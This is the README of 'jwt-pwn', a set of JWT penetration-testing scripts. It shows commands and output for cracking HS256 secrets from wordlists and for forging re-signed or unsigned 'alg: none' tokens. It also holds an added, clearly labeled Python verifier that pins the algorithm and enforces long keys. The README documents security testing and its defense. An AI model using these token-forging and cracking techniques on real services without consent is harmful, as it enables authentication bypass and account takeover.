mazen160 / Jwt Pwn

License: MIT
Security Testing Scripts for JWT

jwt-pwn

Security Testing Scripts for JWT


jwt-cracker.py

JWT password/secret cracker.

$ python3 jwt-cracker.py -jwt "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJqd3QiOiJwd24ifQ.4pOAm1W4SHUoOgSrc8D-J1YqLEv9ypAApz27nfYP5L4" -t 10 -w /pentest/wordlist.txt
[info] Loaded wordlist.
[info] starting brute-forcing.
[#] KEY FOUND: 1234

go-jwt-cracker

A much faster JWT password/secret cracker, written in Go.

$ cd go-jwt-cracker
$ go get
$ go build # Building the binary.

$ ./go-jwt-cracker -wordlist /pentest/wordlist.txt -token "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJqd3QiOiJwd24ifQ.4pOAm1W4SHUoOgSrc8D-J1YqLEv9ypAApz27nfYP5L4"
[+] Key Found: 1234

jwt-decoder.py

Decodes the header and payload of a JWT.

$ python3 jwt-decoder.py "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJqd3QiOiJwd24ifQ.4pOAm1W4SHUoOgSrc8D-J1YqLEv9ypAApz27nfYP5L4"


[#] JWT Header:
{"alg": "HS256", "typ": "JWT"}

[#] JWT Value:
{"jwt": "pwn"}

jwt-any-to-hs256.py

Generates a new HS256-signed JWT with the same payload as a provided JWT.

$ python3 jwt-any-to-hs256.py "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJqd3QiOiJwd24ifQ.4pOAm1W4SHUoOgSrc8D-J1YqLEv9ypAApz27nfYP5L4"


[#] Generated JWT:
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJqd3QiOiJwd24ifQ.WqY6R5zmscIx_6ZFwSASHZ_1zbqih_IdtLv_S2Pj028

jwt-mimicker.py

Generates a new unsigned JWT (header "alg" set to "none") with the same payload as a provided JWT.

$ python3 jwt-mimicker.py "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJqd3QiOiJwd24ifQ.4pOAm1W4SHUoOgSrc8D-J1YqLEv9ypAApz27nfYP5L4"


[#] Generated unsigned JWT:
eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJqd3QiOiJwd24ifQ.
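
The scripts above test for two verifier weaknesses: a guessable HS256 secret (the "1234" found by the crackers) and acceptance of a token whose header selects its own algorithm, including "none". The following is an added example, not part of jwt-pwn, of a verifier that closes both; it uses only the Python standard library instead of pyjwt, and the names sign_hs256, verify_hs256, TokenRejected and DEMO_KEY are hypothetical.

```python
import base64
import hashlib
import hmac
import json
import secrets

MIN_KEY_BYTES = 32  # RFC 7518 section 3.2: HS256 key at least as long as the hash output
DEMO_KEY = secrets.token_bytes(MIN_KEY_BYTES)  # constructed for this example

class TokenRejected(Exception):
    """Raised for any token the verifier refuses."""

def _b64d(seg):
    return base64.urlsafe_b64decode(seg + "=" * (-len(seg) % 4))

def _b64e(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def _check_key(key):
    if len(key) < MIN_KEY_BYTES:
        raise ValueError("HS256 key must be at least 32 random bytes")

def sign_hs256(claims, key):
    """Issue a token; a guessable key such as "1234" is refused outright."""
    _check_key(key)
    head = _b64e(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = _b64e(json.dumps(claims).encode())
    mac = hmac.new(key, f"{head}.{body}".encode(), hashlib.sha256).digest()
    return f"{head}.{body}.{_b64e(mac)}"

def verify_hs256(token, key):
    """Return the claims only for an HS256 token whose MAC matches."""
    _check_key(key)
    parts = token.split(".")
    if len(parts) != 3:
        raise TokenRejected("malformed token")
    try:
        header = json.loads(_b64d(parts[0]))
        supplied = _b64d(parts[2])
    except ValueError as exc:
        raise TokenRejected("malformed token") from exc
    # The verifier pins the algorithm; the token's header never selects it.
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        raise TokenRejected("algorithm not allowed")
    expected = hmac.new(key, f"{parts[0]}.{parts[1]}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, supplied):
        raise TokenRejected("bad signature")
    return json.loads(_b64d(parts[1]))
```

Run against the sample tokens on this page, the unsigned token is refused on its algorithm and the HS256 tokens are refused on their signature, because neither was issued with the verifier's key.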

Requirements

  • Python 2 or Python 3
  • pyjwt

Legal Disclaimer

This project is made for educational and ethical testing purposes only. Usage of jwt-pwn for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

License

The project is licensed under the MIT License.

Author

Mazin Ahmed
